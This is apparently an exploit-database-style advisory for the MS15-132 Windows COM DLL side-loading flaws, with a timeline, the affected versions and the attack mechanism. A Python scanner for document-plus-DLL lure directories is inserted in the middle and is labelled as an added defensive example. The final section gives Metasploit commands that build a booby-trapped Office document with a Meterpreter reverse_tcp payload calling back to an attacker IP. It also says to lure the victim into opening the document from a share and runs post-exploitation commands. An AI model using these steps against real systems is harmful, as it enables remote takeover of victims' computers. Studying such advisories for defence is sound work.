Timeline :
Vulnerabilities discovered and reported to the vendor by multiple security researchers
Patched by the vendor via MS15-132 on 2015-12-08
Metasploit PoC provided on 2015-12-25 by Securify
PoC provided by :
Yorick Koster
Reference(s) :
CVE-2015-6128
CVE-2015-6132
CVE-2015-6133
MS15-132
Affected version(s) :
CVE-2015-6128 affects Windows Vista, Server 2008, Windows 7, Server 2008 R2
CVE-2015-6132 affects Windows Vista, Server 2008, Windows 7, Server 2008 R2, 8 and 8.1, Server 2012 and 2012 R2, RT and RT 8.1, 10
CVE-2015-6133 affects Windows 8 and 8.1, Server 2012 and 2012 R2, RT and RT 8.1, 10
Tested on :
Microsoft Office 2013 SP1 on Windows 7 SP1
Description :
Multiple DLL side-loading vulnerabilities were found in various COM components. These issues can be exploited by embedding one of the affected components in a document as an OLE object. When the vulnerable object is instantiated, Windows tries to load one or more DLLs from the current working directory. If an attacker convinces the victim to open a specially crafted (Office) document from a directory (for example a remote share) that also contains the attacker's DLL file, arbitrary code is executed with the privileges of the target user. This can potentially result in the attacker taking complete control of the affected system.
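A defender-side check for the delivery pattern the description relies on, namely an Office document and an attacker-controlled DLL sitting in the same directory (typically a share the victim opens the document from). This is an added example and is not part of the original advisory, MS15-132 or the Securify PoC; the directory names, file names and file contents it creates are constructed for the demo, and the list of Office extensions is an assumption to adjust to your environment.

```python
import hashlib
import os
from pathlib import Path

# Extensions Office will open and that can carry an embedded OLE object.
# Constructed list for this example; extend it to match your environment.
OFFICE_EXTS = {".doc", ".docx", ".docm", ".rtf", ".xls", ".xlsx", ".xlsm",
               ".ppt", ".pptx", ".pptm"}


def sha256_of(path: Path) -> str:
    """Hash a file so a flagged DLL can be triaged against known-good/known-bad sets."""
    digest = hashlib.sha256()
    with path.open("rb") as fh:
        for chunk in iter(lambda: fh.read(65536), b""):
            digest.update(chunk)
    return digest.hexdigest()


def scan_for_sideload_lures(root):
    """Walk `root` and return one finding per directory that holds both an
    Office document and a DLL, i.e. the layout a CWD side-loading lure needs.

    Each finding: {"dir": str, "documents": [names], "dlls": {name: sha256}}.
    """
    findings = []
    for dirpath, _dirnames, filenames in os.walk(root):
        docs = sorted(f for f in filenames if Path(f).suffix.lower() in OFFICE_EXTS)
        dlls = sorted(f for f in filenames if Path(f).suffix.lower() == ".dll")
        if docs and dlls:
            findings.append({
                "dir": dirpath,
                "documents": docs,
                "dlls": {d: sha256_of(Path(dirpath) / d) for d in dlls},
            })
    return findings


def build_sample_share(base):
    """Constructed sample tree: one lure directory (document + DLL) and one
    benign directory (document only). The file contents are placeholders,
    not real Office documents or DLLs."""
    base = Path(base)
    lure = base / "invoices"
    lure.mkdir(parents=True)
    (lure / "invoice-2015-12.doc").write_bytes(b"not a real document")
    (lure / "helper.dll").write_bytes(b"not a real dll")  # hypothetical name
    benign = base / "reports"
    benign.mkdir()
    (benign / "q4.xlsx").write_bytes(b"also not a real document")
    return base


def demo_scan():
    """Build the constructed sample tree in a temp dir, scan it, return findings."""
    import tempfile
    with tempfile.TemporaryDirectory() as tmp:
        return scan_for_sideload_lures(build_sample_share(tmp))


if __name__ == "__main__":
    # Expected: exactly one finding, for the "invoices" directory.
    for finding in demo_scan():
        print(finding["dir"], finding["documents"], list(finding["dlls"]))
```

Point scan_for_sideload_lures() at the root of a share users open documents from. A hit is not proof of an attack (legitimate software does ship DLLs next to documents), so triage the DLL hash and its signature before acting; and the scan only covers the CWD delivery vector described above, it says nothing about whether the MS15-132 update is installed on the clients.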
Commands :
use exploit/windows/fileformat/ms15_132_dll_sideload
set TARGET 1
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Place the module's output (the generated document and its DLL) together in a remote share folder and have the victim open the document from there.

use exploit/multi/handler
set PAYLOAD windows/meterpreter/reverse_tcp
set LHOST 192.168.6.138
run

Once the Meterpreter session is established :
getuid
sysinfo